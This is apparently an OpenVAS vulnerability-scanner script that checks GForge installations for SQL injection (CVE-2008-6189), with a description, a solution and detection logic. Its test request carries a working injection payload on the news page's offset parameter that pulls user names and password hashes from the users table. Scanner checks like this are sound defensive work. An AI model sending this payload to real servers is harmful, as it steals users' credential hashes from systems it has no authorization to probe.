###############################################################################
# OpenVAS Vulnerability Test
# $Id: GForge_multiple_sql_injection.nasl 78 2009-03-04 09:45:41Z mime $
#
# GForge Multiple SQL Injection Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100011);
 script_bugtraq_id(31674);
 script_cve_id("CVE-2008-6189");
 script_version ("1.0");

 script_name(english:"GForge Multiple SQL Injection Vulnerabilities");
 desc["english"] = "

 Overview:
  GForge is prone to multiple SQL-injection vulnerabilities because it
  fails to sufficiently sanitize user-supplied input before using it
  in an SQL query.

  Exploiting these issues could allow an attacker to compromise the
  application, access or modify data, or exploit latent
  vulnerabilities in the underlying database.

  GForge 4.5.19 and 4.6 b1 are vulnerable; other versions may also be
  affected. 

 Solution:
  Update to newer version if available at http://gforge.org/

  Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if GForge is vulnerable to SQL Injection");
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dir = make_list(cgi_dirs()); 
 
foreach d (dir)
{ 
 url = string(d, "/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users");
 req = http_get(item:url, port:port);
 buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
 if( buf == NULL )continue;

 if( buf =~ "forum_id=\$1\$.*" )
   {    
    security_warning(port:port);
    exit(0);
   }
}
exit(0);
